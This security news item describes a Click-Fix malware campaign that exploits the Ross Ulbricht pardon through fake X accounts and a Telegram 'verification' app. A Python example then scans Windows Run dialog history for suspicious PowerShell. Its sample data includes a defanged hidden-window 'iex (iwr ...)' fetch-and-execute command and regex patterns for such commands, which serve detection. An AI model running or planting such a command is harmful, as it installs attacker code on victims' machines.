Cybercriminals are exploiting the recent pardon of Silk Road founder Ross Ulbricht to spread malware.

The attack leverages a “Click-Fix” tactic, where users are tricked into running malicious code disguised as a necessary step. In this case, fake Ross Ulbricht accounts on X (formerly Twitter) direct users to a Telegram channel.

Within the Telegram channel, users are presented with a fake “identity verification” process. This process culminates in a Telegram mini-app that automatically copies a PowerShell command to the user’s clipboard.

Victims are then instructed to paste this command into the Windows Run dialog and execute it. This action downloads and executes a malicious script, potentially leading to the installation of Cobalt Strike, a powerful penetration testing tool often used by threat actors for malicious purposes.
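For responders checking whether a user followed these instructions, the following is an added example, not code from the original article. It assumes the standard Windows behaviour that commands entered in the Run dialog are recorded in the per-user `RunMRU` registry key; the indicator list and the sample entries are constructed for illustration.

```python
import re

# Win+R history lives in the per-user registry key
#   HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# Each entry's data is the typed/pasted command followed by the suffix "\1".
INTERPRETERS = re.compile(r"\b(powershell|pwsh|cmd|mshta)(\.exe)?\b", re.I)

# Heuristic indicator set (an assumption of this example, not from the article).
INDICATORS = {
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+(hidden|hid|h|1)\b", re.I),
    "encoded_command": re.compile(r"(?<!\S)-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "inline_execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}


def triage_runmru(values):
    """Return (value_name, command, indicators) for suspicious Run dialog entries.

    `values` maps RunMRU value names to their string data, as exported from
    the registry. An entry is flagged only when it launches a script
    interpreter AND shows at least one indicator, so a bare "cmd" is ignored.
    """
    findings = []
    for name, data in values.items():
        if name == "MRUList":  # ordering metadata, not a command
            continue
        command = data[:-2] if data.endswith("\\1") else data
        if not INTERPRETERS.search(command):
            continue
        hits = [label for label, rx in INDICATORS.items() if rx.search(command)]
        if hits:
            findings.append((name, command, hits))
    return findings


# Constructed sample export; the URL is defanged and points at a reserved TLD.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "powershell -w hidden -c \"iex (iwr 'hxxps://example[.]invalid/verify')\"\\1",
}

if __name__ == "__main__":
    for name, command, hits in triage_runmru(SAMPLE_RUNMRU):
        print(f"[!] RunMRU value {name!r}: {', '.join(hits)}\n    {command}")
```

On a live Windows host the same dictionary can be built with the standard-library `winreg` module or from a `reg export` of the key. A hit is a lead for further triage of that user's session, not proof of compromise.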

This sophisticated attack highlights the importance of exercising extreme caution before executing any code received from unknown sources. Users should always verify the authenticity of any such requests and never blindly execute commands from untrusted sources.